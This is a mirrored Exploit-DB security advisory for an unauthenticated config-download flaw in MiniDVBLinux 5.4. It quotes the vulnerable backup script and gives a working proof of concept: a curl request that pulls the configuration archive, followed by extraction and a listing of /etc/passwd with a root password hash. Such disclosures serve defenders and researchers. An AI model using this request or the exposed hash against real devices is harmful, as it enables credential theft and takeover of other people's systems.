3

[remote] MiniDVBLinux <=5.4 - Config Download Exploit

 1 year ago
source link: https://www.exploit-db.com/exploits/51091
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
neoserver,ios ssh client

MiniDVBLinux <=5.4 - Config Download Exploit

EDB-ID:

51091

EDB Verified:

Exploit:

  /  

Platform:

Hardware

Date:

2023-03-27

Vulnerable App:

# Exploit Title: MiniDVBLinux <=5.4 Config Download Exploit
# Exploit Author: LiquidWorm


Vendor: MiniDVBLinux
Product web page: https://www.minidvblinux.de
Affected version: <=5.4

Summary: MiniDVBLinux(TM) Distribution (MLD). MLD offers a simple
way to convert a standard PC into a Multi Media Centre based on the
Video Disk Recorder (VDR) by Klaus Schmidinger. Features of this
Linux based Digital Video Recorder: Watch TV, Timer controlled
recordings, Time Shift, DVD and MP3 Replay, Setup and configuration
via browser, and a lot more. MLD strives to be as small as possible,
modular, simple. It supports numerous hardware platforms, like classic
desktops in 32/64bit and also various low power ARM systems.

Desc: The application is vulnerable to unauthenticated configuration
download when direct object reference is made to the backup function
using an HTTP GET request. This will enable the attacker to disclose
sensitive information and help her in authentication bypass, privilege
escalation and full system access.

====================================================================
/var/www/tpl/setup/Backup/Edit\ backup/51_download_backup.sh:
------------------------------------------------------------
01: <?
02: if [ "$GET_action" = "getconfig" ]; then
03:     . /etc/rc.config
04:     header "Content-Type: application/x-compressed-tar"
05:     header "Content-Disposition: filename=`date +%Y-%m-%d_%H%M_$HOST_NAME`_config.tgz"
06:     /usr/bin/backup-config.sh export /tmp/backup_config_$$.tgz &>/dev/null
07:     cat /tmp/backup_config_$$.tgz
08:     rm -rf /tmp/backup_config*
09:     exit
10: fi
11: ?>
12: <div class="button"><input type="button" value="$(TEXTDOMAIN="backup-www" gt 'Download')" title="$(TEXTDOMAIN="backup-www" gt 'Download a archive of your config')" onclick="window.open('/tpl/setup/Backup/Edit backup/51_download_backup.sh?action=getconfig'); call('')"/></div>

====================================================================

Tested on: MiniDVBLinux 5.4
           BusyBox v1.25.1
           Architecture: armhf, armhf-rpi2
           GNU/Linux 4.19.127.203 (armv7l)
           VideoDiskRecorder 2.4.6


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2022-5713
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5713.php


24.09.2022

--


> curl http://ip:8008/tpl/setup/Backup/Edit%20backup/51_download_backup.sh?action=getconfig -o config.tgz
> mkdir configdir
> tar -xvzf config.tgz -C .\configdir
> cd configdir && cd etc
> type passwd
root:$1$ToYyWzqq$oTUM6EpspNot2e1eyOudO0:0:0:root:/root:/bin/sh
daemon:!:1:1::/:
ftp:!:40:2:FTP account:/:/bin/sh
user:!:500:500::/home/user:/bin/sh
nobody:!:65534:65534::/tmp:
_rpc:x:107:65534::/run/rpcbind:/usr/sbin/nologin
>

report

Recommend

About Joyk


Aggregate valuable and interesting links.
Joyk means Joy of geeK